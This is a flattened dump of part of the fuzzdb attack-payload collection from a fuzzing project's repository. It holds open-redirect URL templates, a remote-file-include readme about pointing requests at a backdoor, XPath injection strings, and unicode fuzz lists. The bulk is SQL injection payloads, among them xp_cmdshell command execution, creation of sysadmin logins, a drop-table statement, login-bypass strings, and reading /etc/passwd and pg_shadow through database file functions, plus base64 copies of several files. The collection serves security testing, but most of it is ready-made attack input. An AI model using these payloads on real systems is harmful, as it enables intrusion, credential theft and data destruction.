--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/redirect-urls-template.txt:
--------------------------------------------------------------------------------
1 | ?url=http://{target}
2 | ?url=https://{target}
3 | ?next=http://{target}
4 | ?next=https://{target}
5 | ?url=http://{target}
6 | ?url=https://{target}
7 | ?url=http://{target}
8 | ?url=//{target}
9 | ?url=$2f%2f{target}
10 | ?next=//{target}
11 | ?next=$2f%2f{target}
12 | ?url=//{target}
13 | ?url=$2f%2f{target}
14 | ?url=//{target}
15 | /redirect/{target}
16 | /cgi-bin/redirect.cgi?{target}
17 | /out/{target}
18 | /out?{target}
19 | /out?/{target}
20 | /out?//{target}
21 | /out?/\{target}
22 | /out?///{target}
23 | ?view={target}
24 | ?view=/{target}
25 | ?view=//{target}
26 | ?view=/\{target}
27 | ?view=///{target}
28 | /login?to={target}
29 | /login?to=/{target}
30 | /login?to=//{target}
31 | /login?to=/\{target}
32 | /login?to=///{target}
33 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/redirect-urls-template.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/rfi/README.md:
--------------------------------------------------------------------------------
1 | rfi.fuzz.txt
2 |
3 | Remote File Include scanning
4 |
5 | Compiled by RSnake 02/01/2010
6 |
7 | Mostly from milw0rm, osvdb.org and elsewhere
8 |
9 | Change XXpathXX to the path of your backdoor.
10 | Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own XXpathXX URL:
11 |
12 | XXpathXX => http://www.example.com/hax.txt?
13 |
14 | see fuzzdb docs:
15 |
16 | /docs/attack-docs/rfi-cheatsheet.html
17 |
18 | Other tools:
19 |
20 | fimap http://code.google.com/p/fimap/
21 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/Generic_SQLI.txt:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/Generic_SQLI.txt.base64:
--------------------------------------------------------------------------------
1 | DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MSSQL.txt:
--------------------------------------------------------------------------------
1 | '; exec master..xp_cmdshell 'ping 10.10.1.2'--
2 | 'create user name identified by 'pass123' --
3 | 'create user name identified by pass123 temporary tablespace temp default tablespace users;
4 | ' ; drop table temp --
5 | 'exec sp_addlogin 'name' , 'password' --
6 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' --
7 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
8 | ' grant connect to name; grant resource to name; --
9 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
10 | ' or 1=1 --
11 | ' union (select @@version) --
12 | ' union (select NULL, (select @@version)) --
13 | ' union (select NULL, NULL, (select @@version)) --
14 | ' union (select NULL, NULL, NULL, (select @@version)) --
15 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) --
16 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
17 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MSSQL_blind.txt:
--------------------------------------------------------------------------------
1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
9 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MSSQL_blind.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MySQL.txt:
--------------------------------------------------------------------------------
1 | 1'1
2 | 1 exec sp_ (or exec xp_)
3 | 1 and 1=1
4 | 1' and 1=(select count(*) from tablenames); --
5 | 1 or 1=1
6 | 1' or '1'='1
7 | 1or1=1
8 | 1'or'1'='1
9 | fake@ema'or'il.nl'='il.nl
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MySQL.txt.base64:
--------------------------------------------------------------------------------
1 | MScxDQoxIGV4ZWMgc3BfIChvciBleGVjIHhwXykNCjEgYW5kIDE9MQ0KMScgYW5kIDE9KHNlbGVjdCBjb3VudCgqKSBmcm9tIHRhYmxlbmFtZXMpOyAtLQ0KMSBvciAxPTENCjEnIG9yICcxJz0nMQ0KMW9yMT0xDQoxJ29yJzEnPScxDQpmYWtlQGVtYSdvcidpbC5ubCc9J2lsLm5sDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MySQL_MSSQL.txt:
--------------------------------------------------------------------------------
1 | 1
2 | 1 and user_name() = 'dbo'
3 | \'; desc users; --
4 | 1\'1
5 | 1' and non_existant_table = '1
6 | ' or username is not NULL or username = '
7 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
8 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
9 | 1 uni/**/on select all from where
10 |
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MySQL_MSSQL.txt.base64:
--------------------------------------------------------------------------------
1 | MQ0KMSBhbmQgdXNlcl9uYW1lKCkgPSAnZGJvJw0KXCc7IGRlc2MgdXNlcnM7IC0tDQoxXCcxDQoxJyBhbmQgbm9uX2V4aXN0YW50X3RhYmxlID0gJzENCicgb3IgdXNlcm5hbWUgaXMgbm90IE5VTEwgb3IgdXNlcm5hbWUgPSAnDQoxIGFuZCBhc2NpaShsb3dlcihzdWJzdHJpbmcoKHNlbGVjdCB0b3AgMSBuYW1lIGZyb20gc3lzb2JqZWN0cyB3aGVyZSB4dHlwZT0ndScpLCAxLCAxKSkpID4gMTE2DQoxIHVuaW9uIGFsbCBzZWxlY3QgMSwyLDMsNCw1LDYsbmFtZSBmcm9tIHN5c29iamVjdHMgd2hlcmUgeHR5cGUgPSAndScgLS0NCjEgdW5pLyoqL29uIHNlbGVjdCBhbGwgZnJvbSB3aGVyZQ0KDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/README.md:
--------------------------------------------------------------------------------
1 |
2 | **MSSQL.fuzz.txt**
3 |
4 | you will need to customize/modify some of the values in the payload queries for best effect
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/README.md:
--------------------------------------------------------------------------------
1 |
2 | various useful post-exploitation commands
3 |
4 | **ms-sql-enumeration.fuzz.txt**
5 | * ms-sqli info disclosure payload fuzzfile
6 | * replace regex with your fuzzer for best results
7 | * run wireshark or tcpdump, look for incoming smb or icmp packets from victim
8 | * might need to terminate payloads with ;--
9 |
10 |
11 | **mysql-injection-login-bypass.fuzz.txt**
12 | * regex replace as many of these placeholders as you can with your fuzzer for best results:
13 | * `<user-fieldname>` `<pass-fieldname>` `<username>`
14 | * also try to brute force a list of possible usernames, including possible admin acct names
15 |
16 | **mysql-read-local-files.fuzz.txt**
17 | * mysql local file disclosure through sqli
18 | * fuzz interesting absolute filepath/filename into `<filepath>`
19 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/db2-enumeration.txt:
--------------------------------------------------------------------------------
1 | select versionnumber, version_timestamp from sysibm.sysversions;
2 | select user from sysibm.sysdummy1;
3 | select session_user from sysibm.sysdummy1;
4 | select system_user from sysibm.sysdummy1;
5 | select current server from sysibm.sysdummy1;
6 | select name from sysibm.systables;
7 | select grantee from syscat.dbauth;
8 | select * from syscat.tabauth;
9 | select * from syscat.dbauth where grantee = current user;
10 | select * from syscat.tabauth where grantee = current user;
11 | select name, tbname, coltype from sysibm.syscolumns;
12 | SELECT schemaname FROM syscat.schemata;
13 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/db2-enumeration.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/mysql-injection-login-bypass.txt:
--------------------------------------------------------------------------------
1 | ' OR 1=1--
2 | 'OR '' = ' Allows authentication without a valid username.
3 | '--
4 | ' union select 1, '', '' 1--
5 | 'OR 1=1--
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/mysql-injection-login-bypass.txt.base64:
--------------------------------------------------------------------------------
1 | PHVzZXJuYW1lPicgT1IgMT0xLS0NCidPUiAnJyA9ICcJQWxsb3dzIGF1dGhlbnRpY2F0aW9uIHdpdGhvdXQgYSB2YWxpZCB1c2VybmFtZS4NCjx1c2VybmFtZT4nLS0NCicgdW5pb24gc2VsZWN0IDEsICc8dXNlci1maWVsZG5hbWU+JywgJzxwYXNzLWZpZWxkbmFtZT4nIDEtLQ0KJ09SIDE9MS0tDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/mysql-read-local-files.txt:
--------------------------------------------------------------------------------
1 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile;
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/mysql-read-local-files.txt.base64:
--------------------------------------------------------------------------------
1 | Y3JlYXRlIHRhYmxlIG15ZmlsZSAoaW5wdXQgVEVYVCk7IGxvYWQgZGF0YSBpbmZpbGUgJzxmaWxlcGF0aD4nIGludG8gdGFibGUgbXlmaWxlOyBzZWxlY3QgKiBmcm9tIG15ZmlsZTsNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/postgres-enumeration.txt:
--------------------------------------------------------------------------------
1 | select version();
2 | select current_database();
3 | select current_user;
4 | select session_user;
5 | select current_setting('log_connections');
6 | select current_setting('log_statement');
7 | select current_setting('port');
8 | select current_setting('password_encryption');
9 | select current_setting('krb_server_keyfile');
10 | select current_setting('virtual_host');
11 | select current_setting('port');
12 | select current_setting('config_file');
13 | select current_setting('hba_file');
14 | select current_setting('data_directory');
15 | select * from pg_shadow;
16 | select * from pg_group;
17 | create table myfile (input TEXT);
18 | copy myfile from '/etc/passwd';
19 | select * from myfile;copy myfile to /tmp/test;
20 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/postgres-enumeration.txt.base64:
--------------------------------------------------------------------------------
1 | c2VsZWN0IHZlcnNpb24oKTsJDQpzZWxlY3QgY3VycmVudF9kYXRhYmFzZSgpOw0Kc2VsZWN0IGN1cnJlbnRfdXNlcjsNCnNlbGVjdCBzZXNzaW9uX3VzZXI7DQpzZWxlY3QgY3VycmVudF9zZXR0aW5nKCdsb2dfY29ubmVjdGlvbnMnKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ2xvZ19zdGF0ZW1lbnQnKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ3BvcnQnKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ3Bhc3N3b3JkX2VuY3J5cHRpb24nKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ2tyYl9zZXJ2ZXJfa2V5ZmlsZScpOw0Kc2VsZWN0IGN1cnJlbnRfc2V0dGluZygndmlydHVhbF9ob3N0Jyk7DQpzZWxlY3QgY3VycmVudF9zZXR0aW5nKCdwb3J0Jyk7DQpzZWxlY3QgY3VycmVudF9zZXR0aW5nKCdjb25maWdfZmlsZScpOw0Kc2VsZWN0IGN1cnJlbnRfc2V0dGluZygnaGJhX2ZpbGUnKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ2RhdGFfZGlyZWN0b3J5Jyk7DQpzZWxlY3QgKiBmcm9tIHBnX3NoYWRvdzsNCnNlbGVjdCAqIGZyb20gcGdfZ3JvdXA7DQpjcmVhdGUgdGFibGUgbXlmaWxlIChpbnB1dCBURVhUKTsNCmNvcHkgbXlmaWxlIGZyb20gJy9ldGMvcGFzc3dkJzsgDQpzZWxlY3QgKiBmcm9tIG15ZmlsZTtjb3B5IG15ZmlsZSB0byAvdG1wL3Rlc3Q7DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/payloads-sql-blind/README.md:
--------------------------------------------------------------------------------
1 | credits: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/string-expansion/shell-expansion.txt:
--------------------------------------------------------------------------------
1 | $HOME
2 | $ENV{'HOME'}
3 | %d
4 | %s
5 | {0}
6 | %*.*s
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/string-expansion/shell-expansion.txt.base64:
--------------------------------------------------------------------------------
1 | JEhPTUUNCiRFTlZ7J0hPTUUnfQ0KJWQNCiVzDQp7MH0NCiUqLipzDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/README.md:
--------------------------------------------------------------------------------
1 | Many of the files in this directory originated from the project
2 | https://github.com/minimaxir/big-list-of-naughty-strings
3 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/corrupted.txt:
--------------------------------------------------------------------------------
1 | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
2 | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
3 | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
4 | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
5 | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/emoji.txt:
--------------------------------------------------------------------------------
1 |
2 | 😍
3 | 👩🏽
4 | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
5 | 🐵 🙈 🙉 🙊
6 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
7 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
8 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
9 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/emoji.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/japanese-emoticon.txt:
--------------------------------------------------------------------------------
1 | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
2 | (。◕ ∀ ◕。)
3 | `ィ(´∀`∩
4 | __ロ(,_,*)
5 | ・( ̄∀ ̄)・:*:
6 | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚
7 | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
8 | (╯°□°)╯︵ ┻━┻)
9 | (ノಥ益ಥ)ノ ┻━┻
10 | ┬─┬ノ( º _ ºノ)
11 | ( ͡° ͜ʖ ͡°)
12 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/japanese-emoticon.txt.base64:
--------------------------------------------------------------------------------
1 | w6PGksK9w6DCvMK8w6DCusuGw5nigJ7DjcWTw6DCusuGw6DCvMK9w6/CvuKAsCDDo8aSwr3DoMK8wrzDoMK6y4bDmeKAnsONxZPDoMK6y4bDoMK8wr3Dr8K+4oCwIA0KKMOvwr3CocOi4oCU4oCiIMOiy4bigqwgw6LigJTigKLDr8K9wqEpDQrDr8K94oKsw6/CvcKoKMOCwrTDosuG4oKsw6/CveKCrMOiy4bCqQ0KX1/Dr8K+4oC6KCxfLCopDQrDo8aSwrsow6/Cv8Kjw6LLhuKCrMOvwr/CoynDo8aSwrs6KjoNCsOvwr7FuMOvwr3CpcOixZPCv8OjxpLCvsOi4oCiwrIow6/CvcKhw6LigJTigKLDouKCrMK/w6LigJTigKLDr8K9wqEpw6LigKLCscOixZPCv8Ovwr3CpcOvwr7FuA0KLMOj4oKs4oCaw6PGksK7Oio6w6PGksK7w6PigJrFk8Oi4oKs4oSiKCDDosucwrsgw4/igLAgw6LLnMK7ICnDo+KCrOKAmsOjxpLCuzoqOsOjxpLCu8Oj4oCaxZPDouKCrOKEog0KKMOi4oCiwq/DgsKww6LigJPCocOCwrDDr8K84oCww6LigKLCr8OvwrjCtSDDouKAncK7w6LigJ3CgcOi4oCdwrspICANCijDr8K+4oCww6DCssKlw6figLrFoMOgwrLCpcOvwrzigLDDr8K+4oCww6/Cu8K/IMOi4oCdwrvDouKAncKBw6LigJ3Cuw0Kw6LigJ3CrMOi4oCd4oKsw6LigJ3CrMOjxpLFvSggw4LCuiBfIMOCwrrDo8aSxb0pDQooIMONwqHDgsKwIMONxZPDiuKAkyDDjcKhw4LCsCkNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/naughty-unicode.txt:
--------------------------------------------------------------------------------
1 | Ω≈ç√∫˜µ≤≥÷
2 | åß∂ƒ©˙∆˚¬…æ
3 | œ∑´®†¥¨ˆøπ“‘
4 | ¡™£¢∞§¶•ªº–≠
5 | ¸˛Ç◊ı˜Â¯˘¿
6 | ÅÍÎÏ˝ÓÔÒÚÆ☃
7 | Œ„´‰ˇÁ¨ˆØ∏”’
8 | `⁄€‹›fifl‡°·‚—±
9 | ⅛⅜⅝⅞
10 | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
11 | ٠١٢٣٤٥٦٧٨٩
12 |
13 |
14 |
15 |
16 |
17 | ⁰⁴⁵
18 | ₀₁₂
19 | ⁰⁴⁵₀₁₂
20 | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็
21 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/regionalindicators.txt:
--------------------------------------------------------------------------------
1 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸
2 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲
3 | 🇺🇸🇷🇺🇸🇦
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/regionalindicators.txt.base64:
--------------------------------------------------------------------------------
1 | w7DFuOKAocK6w7DFuOKAocK4w7DFuOKAocK3w7DFuOKAocK6w7DFuOKAocK4IMOwxbjigKHCpsOwxbjigKHCq8OwxbjigKHCpsOwxbjigKHCssOwxbjigKHCuCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0Kw7DFuOKAocK6w7DFuOKAocK4w7DFuOKAocK3w7DFuOKAocK6w7DFuOKAocK4w7DFuOKAocKmw7DFuOKAocKrw7DFuOKAocKmw7DFuOKAocKyDQrDsMW44oChwrrDsMW44oChwrjDsMW44oChwrfDsMW44oChwrrDsMW44oChwrjDsMW44oChwqYNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/right-to-left.txt:
--------------------------------------------------------------------------------
1 | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
2 | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
3 | הָיְתָהtestالصفحات التّحول
4 | ﷽
5 | ﷺ
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/specialchars.txt:
--------------------------------------------------------------------------------
1 | ,
2 | .
3 | /
4 | ;
5 | '
6 | [
7 | ]
8 | \
9 | -
10 | =
11 | <
12 | >
13 | ?
14 | :
15 | "
16 | {
17 | }
18 | |
19 | _
20 | +
21 | !
22 | @
23 | #
24 | $
25 | %
26 | ^
27 | &
28 | *
29 | (
30 | )
31 | `
32 | ~
33 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/specialchars.txt.base64:
--------------------------------------------------------------------------------
1 | LA0KLg0KLw0KOw0KJw0KWw0KXQ0KXA0KLQ0KPQ0KPA0KPg0KPw0KOg0KIg0Kew0KfQ0KfA0KXw0KKw0KIQ0KQA0KIw0KJA0KJQ0KXg0KJg0KKg0KKA0KKQ0KYA0Kfg0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/two-byte-chars.txt:
--------------------------------------------------------------------------------
1 | 田中さんにあげて下さい
2 | パーティーへ行かないか
3 | 和製漢語
4 | 部落格
5 | 사회과학원 어학연구소
6 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하
7 | 社會科學院語學研究所
8 | 울란바토르
9 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/two-byte-chars.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/upsidedown.txt:
--------------------------------------------------------------------------------
1 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
2 | 00˙Ɩ$-
3 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/upsidedown.txt.base64:
--------------------------------------------------------------------------------
1 | w4vihKLDicKQbmLDocK04oCwbMOJwpAgw4nCkHXDhsaSw4nCkMOJwq8gw4fCncOJwrlvbG9wIMOK4oChw4fCnSDDh8Kdw4nCuW9xw4nCkGwgw4rigKFuIMOK4oChdW5ww6HCtOKAsHDDocK04oCww4nigJ11w6HCtOKAsCDDicK5b2TDicKvw4fCncOK4oChIHBvw4nCr3Nuw6HCtOKAsMOHwp0gb3AgcMOHwp1zICfDiuKAocOhwrTigLBsw4fCnSDDhsaSdcOhwrTigLDDieKAnXPDocK04oCwZMOhwrTigLBww4nCkCDDicK5bsOK4oChw4fCncOK4oChw4nigJ3Dh8Kdc3Vvw4nigJ0gJ8OK4oChw4fCncOJwq/DicKQIMOK4oChw6HCtOKAsHMgw4nCuW9sb3Agw4nCr25zZMOhwrTigLAgw4nCr8OHwp3DicK5b8OLwqUNCjAww4vihKLDhuKAkyQtDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xpath/README.md:
--------------------------------------------------------------------------------
1 | tool:
2 | http://code.google.com/p/xpath-blind-explorer/
3 |
4 | video:
5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
6 |
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xpath/xpath-injection.txt:
--------------------------------------------------------------------------------
1 | ' or '1'='1
2 | ' or ''='
3 | x' or 1=1 or 'x'='y
4 | /
5 | //
6 | //*
7 | */*
8 | @*
9 | count(/child::node())
10 | x' or name()='username' or 'x'='y
11 | ' and count(/*)=1 and '1'='1
12 | ' and count(/@*)=1 and '1'='1
13 | ' and count(/comment())=1 and '1'='1
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xpath/xpath-injection.txt.base64:
--------------------------------------------------------------------------------
1 | JyBvciAnMSc9JzENCicgb3IgJyc9Jw0KeCcgb3IgMT0xIG9yICd4Jz0neQ0KLw0KLy8NCi8vKg0KKi8qDQpAKg0KY291bnQoL2NoaWxkOjpub2RlKCkpDQp4JyBvciBuYW1lKCk9J3VzZXJuYW1lJyBvciAneCc9J3kNCicgYW5kIGNvdW50KC8qKT0xIGFuZCAnMSc9JzENCicgYW5kIGNvdW50KC9AKik9MSBhbmQgJzEnPScxDQonIGFuZCBjb3VudCgvY29tbWVudCgpKT0xIGFuZCAnMSc9JzE=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/README.md:
--------------------------------------------------------------------------------
1 | test.xxe - file that some payloads request from its raw file path in the fuzzdb GitHub repo (those payloads therefore make an outbound request when they fire)
2 | xss-rsnake.fuzz.txt - rsnake's classic fuzzfile, modified to load http://xss.rocks test files
3 | xss-other.fuzz.txt - newer payloads from various sources: my own testing, interesting filter bypasses found in the wild, etc.
4 | xss-uri.fuzz.txt - URI abuse test cases
5 | XSSPolyglot.fuzz.txt - from https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot - check the page for filter evasions and other interesting stuff
6 |
7 |
8 |
9 | HTML5 Cheatsheet
10 | * https://html5sec.org/
11 | * https://github.com/cure53/H5SC
12 |
13 |
14 |
15 | WASC Script Mapping Project
16 | * http://projects.webappsec.org/w/page/13246958/Script%20Mapping
17 |
18 |
19 |
--------------------------------------------------------------------------------
